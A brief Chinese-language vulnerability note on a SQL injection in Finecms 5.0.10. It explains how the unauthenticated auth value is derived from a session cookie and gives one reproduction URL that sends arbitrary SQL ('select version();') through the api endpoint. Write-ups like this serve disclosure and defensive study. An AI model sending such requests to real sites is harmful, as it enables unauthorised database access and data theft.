# Finecms 5.0.10 sql注入漏洞
==========================
一、漏洞简介
————
> auth值是由`zero_ci_session`中zero进行md5加密获取到的,无需登陆便有,且每个站点的站长会进行不同的自定义
二、漏洞影响
————
Finecms 5.0.10
三、复现过程
————
http://0-sec.org/index.php?c=api&m=目标站点的值¶m=action=sql%20sql=%27select%20version();%27
![](/static/qingy/Finecms_5.0.10_sql注入漏洞/img/rId24.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容